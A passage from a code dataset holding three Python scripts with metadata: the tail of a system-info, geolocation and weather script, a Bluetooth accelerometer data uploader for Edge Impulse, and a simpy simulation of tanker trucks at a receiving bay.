platform.processor(),\n\t\t\t\t\t\t\t'Python version' : platform.python_version(),\n\t\t\t\t\t\t\t'Python build' : platform.python_build(),\n\t\t\t\t\t\t\t'Python implementation' : platform.python_implementation(),\n\t\t\t\t\t\t\t'Python compiler' : platform.python_compiler()\n\t\t\t\t\t\t\t}\n\tif Informacje['Processor'] == \"\":\n\t\tInformacje['Processor'] = \"Sorry, I can not determine version of your processor :( Maybe use other modules to do it.. \" \t\t\t\t\n\tfor element in Informacje:\n\t\tprint (element.upper(),\" : \", Informacje[element])\n\t\t\ndef geolocation():\n\turl = 'http://freegeoip.net/json/'\n\tr = requests.get(url)\n\tdata_js = r.json()\n\tfor e in data_js:\n\t\tprint (e, \" : \", data_js[e])\n\tweather(data_js[\"zip_code\"], data_js[\"country_code\"]) \n\ndef weather(zipcode, countrycode):\n\tnazwa = 'http://api.openweathermap.org/data/2.5/weather?zip=' + zipcode[:2] +zipcode[3:] + \",\" + countrycode.lower()+\"&apiid=b5542bcd7e1d8061ab5495b80fc23270\"\n\ta = requests.get(nazwa)\n\tpagoda = a.json()\n\tfor e in pagoda:\n\t\tprint (e, \" : \", pagoda[e])\n\ngeolocation()\t\nbasic_information()\nprint (\"\")\nprint (\"It is your local IP adress : \",get_IP())\n\n", "sub_path": "Python - IP, informations and weather.py", "file_name": "Python - IP, informations and weather.py", "file_ext": "py", "file_size_in_byte": 1558, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 8, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 8, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 8, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 20, "usage_type": "call"}, {"api_name": "platform.release", "line_number": 21, "usage_type": "call"}, {"api_name": "platform.version", "line_number": 22, "usage_type": "call"}, {"api_name": "platform.processor", "line_number": 23, "usage_type": "call"}, {"api_name": "platform.python_version", "line_number": 24, "usage_type": "call"}, {"api_name": "platform.python_build", "line_number": 25, "usage_type": "call"}, {"api_name": "platform.python_implementation", "line_number": 26, "usage_type": "call"}, {"api_name": "platform.python_compiler", "line_number": 27, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 36, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "517024963", "text": "import json\nimport time, hmac, hashlib\nimport requests\nimport re, uuid\nimport math\nimport sys\nimport time\nimport binascii\nimport struct\nfrom bluepy import btle\nfrom bluepy.btle import UUID, Peripheral\n\n\n\nif len(sys.argv) != 4:\n\tprint(\"Fatal, must pass device address:\", sys.argv[0], \"\")\n\tquit()\naccelServiceUuid = \"2BEEF31A-B10D-271C-C9EA-35D865C1F48A\"\naccCharUuid = \"4664E7A1-5A13-BFFF-4636-7D0A4B16496C\"\nperipheralObject = btle.Peripheral(sys.argv[1])\n\n\n# Your API & HMAC keys can be found here (go to your project > Dashboard > Keys to find this)\nHMAC_KEY = \"Your HMAC Key\"\nAPI_KEY = \"Your API Key\"\n\n\nmySensor = btle.UUID(accelServiceUuid)\nsensorService = peripheralObject.getServiceByUUID(mySensor)\n\n\naccValue = sensorService.getCharacteristics(accCharUuid)[0]\n\n#print(cur_time,\"\\t\", acc_x,\"\\t\",acc_y,\"\\t\",acc_z,\"\\t\")\n\t\t\n\n\n# empty signature (all zeros). HS256 gives 32 byte signature, and we encode in hex, so we need 64 characters here\nemptySignature = ''.join(['0'] * 64)\n\n# use MAC address of network interface as deviceId\ndevice_name =\"Temp_BLe\"\nNAME=sys.argv[2]\nTIME=int(sys.argv[3])\n# here we have new data every 16 ms\nINTERVAL_MS = 90\n\nif INTERVAL_MS <= 0:\n raise Exception(\"Interval in miliseconds cannot be equal or lower than 0.\")\n\n# here we'll collect 2 seconds of data at a frequency defined by interval_ms\nfreq =1000/INTERVAL_MS\nvalues_list=[]\nfor i in range (TIME*int(round(freq,0))):\n accVal=accValue.read()\n accV=[accVal[i:i+4] for i in range(0, len(accVal), 4)]\n acc_x=struct.unpack('f',accV[0])[0]\n acc_y=struct.unpack('f',accV[1])[0]\n acc_z=struct.unpack('f',accV[2])[0]\n values_list.append([acc_x*9.865,acc_y*9.865,acc_z*9.865])\n\ndata = {\n \"protected\": {\n \"ver\": \"v1\",\n \"alg\": \"HS256\",\n \"iat\": time.time() # epoch time, seconds since 1970\n },\n \"signature\": emptySignature,\n \"payload\": {\n \"device_name\": device_name,\n \"device_type\": \"BLE_TEST_DEVICE\",\n \"interval_ms\": INTERVAL_MS,\n \"sensors\": [\n { \"name\": \"accX\", \"units\": \"m/s2\" },\n { \"name\": \"accY\", \"units\": \"m/s2\" },\n { \"name\": \"accZ\", \"units\": \"m/s2\" }\n ],\n \"values\": values_list\n }\n}\n\n\n\n# encode in JSON\nencoded = json.dumps(data)\n\n# sign message\nsignature = hmac.new(bytes(HMAC_KEY, 'utf-8'), msg = encoded.encode('utf-8'), digestmod = hashlib.sha256).hexdigest()\n\n# set the signature again in the message, and encode again\ndata['signature'] = signature\nencoded = json.dumps(data)\n\n# and upload the file\nres = requests.post(url='https://ingestion.edgeimpulse.com/api/training/data',\n data=encoded,\n headers={\n 'Content-Type': 'application/json',\n 'x-file-name': NAME,\n 'x-api-key': API_KEY\n })\nif (res.status_code == 200):\n print('Uploaded file to Edge Impulse', res.status_code, res.content)\nelse:\n print('Failed to upload file to Edge Impulse', res.status_code, res.content)\n", "sub_path": "train_collect.py", "file_name": "train_collect.py", "file_ext": "py", "file_size_in_byte": 3041, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 16, "usage_type": "attribute"}, {"api_name": "bluepy.btle.Peripheral", "line_number": 20, "usage_type": "call"}, {"api_name": "bluepy.btle", "line_number": 20, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "bluepy.btle.UUID", "line_number": 28, "usage_type": "call"}, {"api_name": "bluepy.btle", "line_number": 28, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 57, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 58, "usage_type": "call"}, {"api_name": "struct.unpack", "line_number": 59, "usage_type": "call"}, {"api_name": "time.time", "line_number": 66, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 85, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 88, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 88, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 92, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 95, "usage_type": "call"}]} +{"seq_id": "118377716", "text": "from __future__ import division\nimport random\nimport simpy\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\nimport pandas as pd\nimport datetime\n\nfrom Systems.recvBay import RecvBays\nfrom Systems.plant import Plants\nfrom Agents.truck import Truck\nfrom Utilities.recvsilos import RecvSilos\nfrom Animation.animation import Animation\nimport sys\n\nRANDOM_SEED = 24\nFIXED_WASH_TIME = 10\nFIXED_SCALE_TIME = 5\nSIM_TIME = 60*60\nHUMAN_RECEIVER_OPERATION_TIME = 5\nUNLOAD_FLOW_RATE = 1000 # lbs/minute\nNUM_HUMAN_RECEIVERS = 1\nNUM_SCALES = 1\nMAX_REASONABLE_WAIT_TO_UNLOAD = 40\nPERCENTAGE_UNLOAD_TANDEM_ARRIVALS = 50\nPERCENTAGE_LOADOUT_ARRIVALS = 20\nPERCENTAGE_LOADOUT_TANDEM_ARRIVALS = 90\nPERCENTAGE_UNLOAD_REQUIRE_WASH = 100\nPERCENTAGE_LOADOUT_REQUIRE_WASH = 100\n\nRUN_ANIMATION = False\n\n\nclass Simulation(object):\n def __init__(self, name, num_scales, num_human_receivers, fixed_wash_time,\n scale_time, max_sim_time, human_receiver_operation_time, run_realtime=False):\n if run_realtime is True:\n self.env = simpy.rt.RealtimeEnvironment(initial_time=0, factor=0.05,\n strict=False)\n else:\n self.env = simpy.Environment()\n self.env.process(self.setup_simulation(name, num_scales, num_human_receivers,\n fixed_wash_time, scale_time,\n human_receiver_operation_time,\n max_sim_time))\n\n self.BaySystem = None\n self.SiloSystem = None\n self.PlantSystem = None\n\n # assuming empty system at the beginning of simulation\n self.system_truck_count = {'x': [0], 'y': [0]}\n self.count = {'tankers_in_system': {'time': [0], 'count': [0], 'color': 'blue', 'linestyle': '-',\n 'location': (0, 0)},\n 'tankers_waiting_for_scale': {'time': [0], 'count': [0], 'color': 'orange','linestyle': '-',\n 'location': (1, 0)},\n 'tankers_waiting_for_bay': {'time': [0], 'count': [0], 'color': 'teal', 'linestyle': '-',\n 'location': (2, 0)},\n 'tankers_in_bays': {'time': [0], 'count': [0], 'color': 'blue', 'linestyle': '-',\n 'location': (0, 1)},\n 'tankers_waiting_for_unload': {'time': [0], 'count': [0], 'color': 'tan', 'linestyle': '-',\n 'location': (3, 0)},\n 'tankers_waiting_for_wash': {'time': [0], 'count': [0], 'color': 'olive', 'linestyle': '-',\n 'location': None},\n 'tankers_waiting_for_loadout': {'time': [0], 'count': [0], 'color': 'wheat', 'linestyle': '-',\n 'location': (5, 0)}}\n\n self.KPIs = {'tankers_entered_scale_count': 0, 'avg_wait_to_scale': 0,\n 'tankers_entered_unload_bay_count': 0, 'avg_wait_to_unload': 0,\n 'tankers_entered_CIP_bay_count': 0, 'avg_wait_to_CIP': 0,\n 'tankers_requested_CIP_unit_count': 0, 'avg_wait_for_CIP_unit': 0,\n 'tankers_entered_loadout_bay_count': 0, 'avg_wait_to_loadout': 0,\n 'receiver_requests_count': 0, 'avg_wait_for_receiver': 0,\n 'tankers_scaled_count': 0, 'avg_scale_time': 0,\n 'tankers_unloaded_count': 0, 'avg_unload_time': 0,\n 'tankers_washed_count': 0, 'avg_wash_time': 0,\n 'tankers_loadedout_count': 0, 'avg_loadout_time': 0,\n 'receiver_procedures_count': 0, 'avg_receiver_time': 0,\n 'tankers_left': 0, 'avg_throughput_time': 0}\n\n self.KPIs_over_time = {'avg_wait_to_scale': {'time': [0], 'val': [0], 'color': 'orange', 'location': (1, 1)},\n 'avg_scale_time': {'time': [0], 'val': [0], 'color': 'orange', 'location': (1, 2)},\n 'avg_wait_to_unload': {'time': [0], 'val': [0], 'color': 'tan', 'location': (3, 1)},\n 'avg_unload_time': {'time': [0], 'val': [0], 'color': 'tan', 'location': (3, 2)},\n 'avg_wait_to_CIP': {'time': [0], 'val': [0], 'color': 'olive', 'location': (4, 0)},\n 'avg_wait_for_CIP_unit': {'time': [0], 'val': [0], 'color': 'olive', 'location': (4, 1)},\n 'avg_wash_time': {'time': [0], 'val': [0], 'color': 'olive', 'location': (4, 2)},\n 'avg_wait_to_loadout': {'time': [0], 'val': [0], 'color': 'wheat', 'location': (5, 1)},\n 'avg_loadout_time': {'time': [0], 'val': [0], 'color': 'wheat', 'location': (5, 2)},\n 'avg_wait_for_receiver': {'time': [0], 'val': [0], 'color': 'salmon', 'location':(2, 1)},\n 'avg_receiver_time': {'time': [0], 'val': [0], 'color': 'salmon', 'location': (2, 2)},\n 'avg_throughput_time': {'time': [0], 'val': [0], 'color': 'blue', 'location': (0, 2)}}\n\n # will be setup in 'setup_simulation'\n self.fig_performance, self.axes_performance, self.line_data_performance, self.annotation_performance = \\\n None, None, None, None\n self.fig_silo_levels, self.axes_silo_levels, self.silo_axis_dict, self.line_data_silo_levels = \\\n None, None, None, None\n\n def setup_simulation(self, name, num_scales, num_human_receivers, fixed_wash_time,\n scale_time, human_receiver_operation_time, max_sim_time):\n\n \"\"\"LOAD SYSTEM DATA WORKBOOK\"\"\"\n data_workbook = pd.ExcelFile(\"System Data.xlsx\")\n df_bays = pd.read_excel(data_workbook, 'Bays')\n bay_dict = df_bays.set_index(['Bay Name']).T.to_dict()\n\n df_cip_units = pd.read_excel(data_workbook, 'CIP Units')\n cip_units_dict = {unit_ID: {'bays': list(df_cip_units[df_cip_units['CIP Unit ID'] ==\n unit_ID]['Bay Name'].unique()),\n 'simultaneous_services': max(list(df_cip_units[df_cip_units['CIP Unit ID'] ==\n unit_ID]\n ['Max Simultaneous Services'].unique()))}\n for unit_ID in list(df_cip_units['CIP Unit ID'].unique())}\n\n \"\"\"SETUP BAY SYSTEM BASED ON DATA\"\"\"\n self.BaySystem = RecvBays(self.env, name, bay_dict, cip_units_dict, num_scales, num_human_receivers,\n fixed_wash_time, scale_time, human_receiver_operation_time, self.print_event)\n\n # Setup silos. Each creates simpy container object\n df_silos = pd.read_excel(data_workbook, 'Silos')\n df_silos.rename(columns={'Silo Capacity': 'capacity', 'Silo Initial Level': 'init_level',\n 'Silo Inlet Flow Rate': 'inlet_flow_rate', 'Silo Type': 'silo_type',\n 'Silo Outlet Flow Rate': 'outlet_flow_rate'}, inplace=True)\n silo_dict = df_silos.set_index('Silo Name').T.to_dict()\n\n df_bus_inlets = pd.read_excel(data_workbook, 'Bus Inlets')\n for silo in list(df_bus_inlets['Silo Name'].unique()):\n silo_dict[silo]['bays'] = dict(df_bus_inlets[df_bus_inlets['Silo Name'] ==\n silo][['Bay Name', 'Inlet Flow Rate']].values)\n\n \"\"\"SETUP SILO SYSTEM\"\"\"\n self.SiloSystem = RecvSilos(name, self.env, silo_dict,\n {bay_id: {i: bay_dict[bay_id]['Rate - Pump' + str(i)] for i in range(1, 3)\n if bay_dict[bay_id]['Rate - Pump' + str(i)] > 0}\n for bay_id in bay_dict.keys()},\n self.print_event, self.plot_silo_level)\n\n df_plants = pd.read_excel(data_workbook, 'Plants')\n df_plants.rename(columns={'Plant Intake Fluid Rate': 'intake_rate'}, inplace=True)\n plant_dict = df_plants[['Plant Name', 'intake_rate']].set_index('Plant Name').T.to_dict()\n\n \"\"\"SETUP PLANTS\"\"\"\n self.PlantSystem = Plants(self.env, plant_dict, self.SiloSystem, self.print_event)\n\n # Produce trucks until the end of simulation\n truck_id = 0\n truck_objects_list = []\n\n self.fig_silo_levels, self.axes_silo_levels, self.silo_axis_dict, self.line_data_silo_levels = \\\n self.setup_silo_plots(self.SiloSystem)\n self.fig_performance, self.axes_performance, self.line_data_performance, self.annotation_performance = self.setup_count_plot()\n\n self.plot_silo_level(self.SiloSystem.silos.keys())\n\n while True and self.env.now <= max_sim_time:\n\n self.env.process(self.PlantSystem.run_plants(self.SiloSystem))\n\n \"\"\"Wait until the next tanker arrive\"\"\"\n yield self.env.timeout(self.time_until_next_arrival())\n\n # Truck arrived, update the system truck count\n self.update_count('tankers_in_system', delta=1)\n truck_id += 1\n\n # Create a truck object with load pounds,\n # also pass in our System object(s)\n truck = Truck(truck_id, self.generate_load_config(), self.BaySystem, self.env,\n MAX_REASONABLE_WAIT_TO_UNLOAD, self.print_event)\n truck_objects_list.append(truck)\n self.print_event(time=self.env.now, agent=\"Truck \"+str(truck.name),\n event=\"Arrived for {}\".format(truck.type), fluid_lbs=truck.load_pounds)\n\n '''Start the process to unload the truck'''\n # sequentially request different silos for unload\n self.env.process(truck.request_processing(self.SiloSystem, self))\n plt.pause(0.01)\n # plt.legend()\n\n def update_kpi(self, new_value, kpi=None):\n \"\"\"\n Method when called with proper KPI will update it and call for update in plot\n \"\"\"\n\n if kpi in self.KPIs.keys():\n\n if kpi == 'avg_wait_to_scale':\n self.KPIs['avg_wait_to_scale'] = \\\n (self.KPIs['avg_wait_to_scale']*self.KPIs['tankers_entered_scale_count'] +\n new_value)/(self.KPIs['tankers_entered_scale_count'] + 1)\n self.KPIs['tankers_entered_scale_count'] += 1\n\n if kpi == 'avg_wait_to_unload':\n self.KPIs['avg_wait_to_unload'] = \\\n (self.KPIs['avg_wait_to_unload']*self.KPIs['tankers_entered_unload_bay_count'] +\n new_value)/(self.KPIs['tankers_entered_unload_bay_count'] + 1)\n self.KPIs['tankers_entered_unload_bay_count'] += 1\n\n if kpi == 'avg_wait_to_CIP':\n self.KPIs['avg_wait_to_CIP'] = \\\n (self.KPIs['avg_wait_to_CIP'] * self.KPIs['tankers_entered_CIP_bay_count'] +\n new_value) / (self.KPIs['tankers_entered_CIP_bay_count'] + 1)\n self.KPIs['tankers_entered_CIP_bay_count'] += 1\n\n if kpi == 'avg_wait_for_CIP_unit':\n self.KPIs['avg_wait_for_CIP_unit'] = \\\n (self.KPIs['avg_wait_for_CIP_unit'] * self.KPIs['tankers_requested_CIP_unit_count'] +\n new_value) / (self.KPIs['tankers_requested_CIP_unit_count'] + 1)\n self.KPIs['tankers_requested_CIP_unit_count'] += 1\n\n if kpi == 'avg_wait_to_loadout':\n self.KPIs['avg_wait_to_loadout'] = \\\n (self.KPIs['avg_wait_to_loadout'] * self.KPIs['tankers_entered_loadout_bay_count'] +\n new_value) / (self.KPIs['tankers_entered_loadout_bay_count'] + 1)\n self.KPIs['tankers_entered_loadout_bay_count'] += 1\n\n if kpi == 'avg_wait_for_receiver':\n self.KPIs['avg_wait_for_receiver'] = \\\n (self.KPIs['avg_wait_for_receiver'] * self.KPIs['receiver_requests_count'] +\n new_value) / (self.KPIs['receiver_requests_count'] + 1)\n self.KPIs['receiver_requests_count'] += 1\n\n if kpi == 'avg_scale_time':\n self.KPIs['avg_scale_time'] = \\\n (self.KPIs['avg_scale_time'] * self.KPIs['tankers_scaled_count'] +\n new_value) / (self.KPIs['tankers_scaled_count'] + 1)\n self.KPIs['tankers_scaled_count'] += 1\n\n if kpi == 'avg_unload_time':\n self.KPIs['avg_unload_time'] = \\\n (self.KPIs['avg_unload_time'] * self.KPIs['tankers_unloaded_count'] +\n new_value) / (self.KPIs['tankers_unloaded_count'] + 1)\n self.KPIs['tankers_unloaded_count'] += 1\n\n if kpi == 'avg_wash_time':\n self.KPIs['avg_wash_time'] = \\\n (self.KPIs['avg_wash_time'] * self.KPIs['tankers_washed_count'] +\n new_value) / (self.KPIs['tankers_washed_count'] + 1)\n self.KPIs['tankers_washed_count'] += 1\n\n if kpi == 'avg_loadout_time':\n self.KPIs['avg_loadout_time'] = \\\n (self.KPIs['avg_loadout_time'] * self.KPIs['tankers_loadedout_count'] +\n new_value) / (self.KPIs['tankers_loadedout_count'] + 1)\n self.KPIs['tankers_loadedout_count'] += 1\n\n if kpi == 'avg_receiver_time':\n self.KPIs['avg_receiver_time'] = \\\n (self.KPIs['avg_receiver_time'] * self.KPIs['receiver_procedures_count'] +\n new_value) / (self.KPIs['receiver_procedures_count'] + 1)\n self.KPIs['receiver_procedures_count'] += 1\n\n if kpi == 'avg_throughput_time':\n self.KPIs['avg_throughput_time'] = \\\n (self.KPIs['avg_throughput_time'] * self.KPIs['tankers_left'] +\n new_value) / (self.KPIs['tankers_left'] + 1)\n self.KPIs['tankers_left'] += 1\n\n self.update_kpi_over_time(kpi)\n\n def update_kpi_over_time(self, kpi):\n if kpi in self.KPIs_over_time.keys():\n self.KPIs_over_time[kpi]['time'].append(self.env.now)\n self.KPIs_over_time[kpi]['val'].append(self.KPIs[kpi])\n subplot_loc = self.KPIs_over_time[kpi]['location']\n # self.axes_count[self.KPIs_over_time[kpi]['location']].plot(self.KPIs_over_time[kpi]['time'],\n # self.KPIs_over_time[kpi]['val'],\n # color=self.KPIs_over_time[kpi]['color'])\n self.line_data_performance[subplot_loc].set_xdata(self.KPIs_over_time[kpi]['time'])\n self.line_data_performance[subplot_loc].set_ydata(self.KPIs_over_time[kpi]['val'])\n self.axes_performance[subplot_loc].set_ylim(0, max(self.KPIs_over_time[kpi]['val']) + 20)\n self.axes_performance[subplot_loc].set_yticks(\n range(0, int(max(self.KPIs_over_time[kpi]['val'])) + 20,\n max(int(max(self.KPIs_over_time[kpi]['val'])/5), 5)))\n if self.annotation_performance[subplot_loc] is not None:\n self.annotation_performance[subplot_loc].remove()\n self.annotation_performance[subplot_loc] = \\\n self.axes_performance[subplot_loc].annotate(\"{:.1f}\".format(self.KPIs[kpi]),\n (self.env.now, self.KPIs[kpi]))\n\n def run(self, sim_time):\n \"\"\"Start simulation with specified end time\"\"\"\n self.env.run(until=sim_time)\n\n def setup_count_plot(self):\n figure, axes = plt.subplots(6, 3)\n figure.tight_layout()\n line_data = {}\n annotation = {(i, j): None for i in range(6) for j in range(3)}\n\n for param in self.count.keys():\n subplot_loc = self.count[param]['location']\n if subplot_loc is not None: #things not to be plotted\n line_data[subplot_loc], = \\\n axes[subplot_loc].step(self.count[param]['time'], self.count[param]['count'],\n where='post', color=self.count[param]['color'],\n linestyle=self.count[param]['linestyle'])\n title = param.replace('_', ' ').upper()\n axes[subplot_loc].set_title(title)\n axes[subplot_loc].set_xlim(0, SIM_TIME)\n # axes[subplot_loc].grid(b=True, which='both')\n\n for KPI in self.KPIs_over_time.keys():\n subplot_loc = self.KPIs_over_time[KPI]['location']\n if subplot_loc is not None:\n line_data[subplot_loc], = \\\n axes[subplot_loc].plot(self.KPIs_over_time[KPI]['time'],\n self.KPIs_over_time[KPI]['val'],\n color=self.KPIs_over_time[KPI]['color'])\n title = KPI.replace('_', ' ').upper()\n axes[subplot_loc].set_title(title)\n axes[subplot_loc].set_xlim(0, SIM_TIME)\n # axes[subplot_loc].grid(b=True, which='both')\n\n return figure, axes, line_data, annotation\n\n def update_count(self, param, delta=0):\n if param in self.count.keys():\n self.count[param]['time'].append(self.env.now)\n self.count[param]['count'].append(self.count[param]['count'][-1] + delta)\n\n self.line_data_performance[self.count[param]['location']].set_xdata(self.count[param]['time'])\n self.line_data_performance[self.count[param]['location']].set_ydata(self.count[param]['count'])\n self.axes_performance[self.count[param]['location']].set_ylim(0, max(self.count[param]['count']) + 1)\n self.axes_performance[self.count[param]['location']].set_yticks(range(0,\n max(self.count[param]['count']) + 1))\n\n @staticmethod\n def setup_silo_plots(silo_system):\n fig, axes = plt.subplots(int(len(silo_system.silos.keys())/2), 2)\n fig.tight_layout()\n row_count, col_count = 0, 0\n silo_axis_dict = {}\n line_data = {}\n for silo in silo_system.silos.keys():\n line_data[(row_count, col_count)], = axes[row_count, col_count].plot(\n silo_system.level_timestamps[silo]['x'], silo_system.level_timestamps[silo]['y'], color='r')\n axes[row_count, col_count].set_title(silo)\n silo_axis_dict[silo] = (row_count, col_count)\n axes[row_count, col_count].set_ylim(0, silo_system.silos[silo].capacity)\n axes[row_count, col_count].set_xlim(0, SIM_TIME)\n axes[row_count, col_count].grid(b=True, which='both')\n\n if col_count == 1:\n col_count = 0\n row_count += 1\n else:\n col_count += 1\n return fig, axes, silo_axis_dict, line_data\n\n def plot_silo_level(self, silos):\n for silo in silos:\n self.line_data_silo_levels[self.silo_axis_dict[silo]].set_xdata(self.SiloSystem.level_timestamps[silo]['x'])\n self.line_data_silo_levels[self.silo_axis_dict[silo]].set_ydata(self.SiloSystem.level_timestamps[silo]['y'])\n\n @staticmethod\n def time_until_next_arrival():\n return random.randint(1, 60)\n\n @staticmethod\n def generate_load_config():\n '''MOVE THIS TO CLASS VARIABLE AFTER TESTING. UNNECESSARY TO GENERATE AT EVERY CALL'''\n choices_loadout_unload = PERCENTAGE_LOADOUT_ARRIVALS*['loadout'] + \\\n (100-PERCENTAGE_LOADOUT_ARRIVALS)*['unload']\n random.shuffle(choices_loadout_unload)\n choices_unload_tandems = PERCENTAGE_UNLOAD_TANDEM_ARRIVALS*['tandem'] + \\\n (100-PERCENTAGE_UNLOAD_TANDEM_ARRIVALS)*['single']\n choices_loadout_tandems = PERCENTAGE_LOADOUT_TANDEM_ARRIVALS * ['tandem'] + \\\n (100 - PERCENTAGE_LOADOUT_TANDEM_ARRIVALS) * ['single']\n choices_unload_wash = PERCENTAGE_UNLOAD_REQUIRE_WASH*[True] + \\\n (100-PERCENTAGE_UNLOAD_REQUIRE_WASH)*[False]\n choices_loadout_wash = PERCENTAGE_LOADOUT_REQUIRE_WASH * [True] + \\\n (100 - PERCENTAGE_LOADOUT_REQUIRE_WASH) * [False]\n random.shuffle(choices_unload_tandems)\n random.shuffle(choices_loadout_tandems)\n random.shuffle(choices_unload_wash)\n random.shuffle(choices_loadout_wash)\n\n if random.choice(choices_loadout_unload) == 'unload':\n if random.choice(choices_unload_tandems) == 'tandem':\n return {'type': 'unload',\n 'is_tandem': True,\n 'require_wash': random.choice(choices_unload_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': random.randint(65, 85)}\n else:\n return {'type': 'unload',\n 'is_tandem': False,\n 'require_wash': random.choice(choices_unload_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': 100}\n else:\n \"\"\"in case of loadouts, load_pounds are ideal requested pounds of loadout fluid\"\"\"\n if random.choice(choices_loadout_tandems) == 'tandem':\n return {'type': 'loadout',\n 'is_tandem': True,\n 'require_wash': random.choice(choices_loadout_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': random.randint(65, 85)}\n else:\n return {'type': 'loadout',\n 'is_tandem': False,\n 'require_wash': random.choice(choices_loadout_wash),\n 'load_pounds': random.randint(65000, 73000),\n 'percentage_pounds_front_tanker': 100}\n\n @staticmethod\n def print_event(time=\"-\", system=\"-\", agent=\"-\", event=\"-\", utility=\"-\", fluid_lbs=\"-\", etc=\"-\"):\n print(\"%-8s%-12s%-12s%-35s%-12s%-13s%-15s\" % (str(time), str(system), str(agent),\n str(event), str(utility), str(fluid_lbs), str(etc)))\n\n\nclass Logger(object):\n def __init__(self):\n self.terminal = sys.stdout\n self.log = open('sim_log/output.log', 'a')\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n # for python 3 capability\n pass\n\n\nif __name__ == '__main__':\n sys.stdout = Logger()\n print(\"Receiving Bay - Simulation started at \" +\n \"{}\".format(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')))\n random.seed(RANDOM_SEED)\n start = time.clock()\n\n my_sim = Simulation('Sunnyside', NUM_SCALES, NUM_HUMAN_RECEIVERS, FIXED_WASH_TIME, FIXED_SCALE_TIME,\n SIM_TIME, HUMAN_RECEIVER_OPERATION_TIME, run_realtime=False)\n print('Time taken to setup simulation = {}'.format(time.clock()-start))\n print(\"\\n\")\n my_sim.print_event(\"TIME\", \"SYSTEM\", \"AGENT\", \"EVENT\", \"UTILITY\", \"FLUID LBS\", \"ET_COMPLETION\")\n my_sim.print_event(8 * \"-\", 12 * \"-\", 12 * \"-\", 35 * \"-\", 12 * \"-\", 13 * \"-\", 15 * \"-\")\n\n # style.use('seaborn-darkgrid')\n # plt.style.use('dark_background')\n\n if RUN_ANIMATION:\n my_animation = Animation(my_sim)\n my_sim.env.process(my_animation.run_animation())\n start = time.process_time()\n my_sim.run(SIM_TIME)\n for key, val in my_sim.KPIs.items():\n print(\"{} = {}\".format(key, val))\n print(\"\\n\")\n print('Time taken to run simulation = {}'.format(time.process_time() - start))\n print(\"\\n\\n\")\n plt.show()\n", "sub_path": "sim2.py", "file_name": "sim2.py", "file_ext": "py", "file_size_in_byte": 24296, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "simpy.rt.RealtimeEnvironment", "line_number": 39, "usage_type": "call"}, {"api_name": "simpy.rt", "line_number": 39, "usage_type": "attribute"}, {"api_name": "simpy.Environment", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.ExcelFile", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 106, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 109, "usage_type": "call"}, {"api_name": "Systems.recvBay.RecvBays", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 122, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 128, "usage_type": "call"}, {"api_name": "Utilities.recvsilos.RecvSilos", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 140, "usage_type": "call"}, {"api_name": "Systems.plant.Plants", "line_number": 145, "usage_type": "call"}, {"api_name": "Agents.truck.Truck", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 332, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 332, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 360, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 367, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 376, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 377, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 378, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 379, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 381, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 382, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 385, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 386, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 387, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 391, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 392, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 396, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 399, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 400, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 401, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 405, 